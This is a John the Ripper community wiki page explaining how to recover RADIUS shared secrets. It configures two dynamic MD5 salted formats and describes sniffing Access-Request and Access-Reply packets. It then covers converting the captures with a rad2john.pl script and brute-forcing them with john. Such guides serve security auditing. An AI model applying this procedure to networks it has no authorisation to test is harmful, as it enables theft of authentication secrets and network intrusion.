Using John to crack RADIUS shared secrets

The RADIUS protocol is using a shared secret between each client and the RADIUS server for two purposes: protecting user passwords and authentication of the RADIUS server replies. This is based on MD5 with a salt.

The attached perl script is implementing two attacks as discussed in An Analysis of the RADIUS Authentication Protocol, by Joshua Hill.

To use this script, you will need john-1.7.9 with all the patches up to 0043-dynamic-salt-rewrite.

john will need to be configured so that dynamic_1008 implements md5($p.$s), and dynamic_1009 does md5($s.$p). Below are the changes to make to dynamic.conf to implemnt these formats:

####################################################################
# Dynamic type for algorithm used in RADIUS User-Password attrinute md5($p.$s)
####################################################################
[List.Generic:dynamic_1008]
# expression shown will be this string:
Expression=md5($p.$s) [RADIUS User-Password]
# Flag needed here, is Salt
Flag=MGF_SALTED
# The salt has a fixed length of 16 bytes
Saltlen=16
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_keys
Func=DynamicFunc__append_salt
Func=DynamicFunc__crypt
Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
######################################################################
# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
######################################################################
[List.Generic:dynamic_1009]
Expression=md5($s.$p) [RADIUS Responses]
Flag=MGF_SALTED
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys
Func=DynamicFunc__crypt
Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1

You will need to:

  1. either be able to try authentications with a specific login and password, and sniff the Access-Request packets
  2. or snifff Access-Request and corresponding Access-Reply packets

When you have obtained packet capture files; you will need to change the perl script source file to tell which login(s) you have used in 1) ; and launch the perl script, by giving the capture file(s) in argument, and redirect its output in a file:

perl rad2john.pl capture1.cap capture2.cap ... >radius.john

It will extract information from the capture files, and dump it in dynamic_1008 and dynamic_1009 format, depending if the login found is known. By default, it will only dump one line per client machine viewed, but this is also configurable (see the perl script file).

You can then launch john with the result file, using

john --format=dynamic_1008 radius.john

or

john --format=dynamic_1009 radius.john

depending on which attack you are interested in. You can of course add options to implement specific bruteforce schemes.


Back to advanced usage examples, John the Ripper user community resources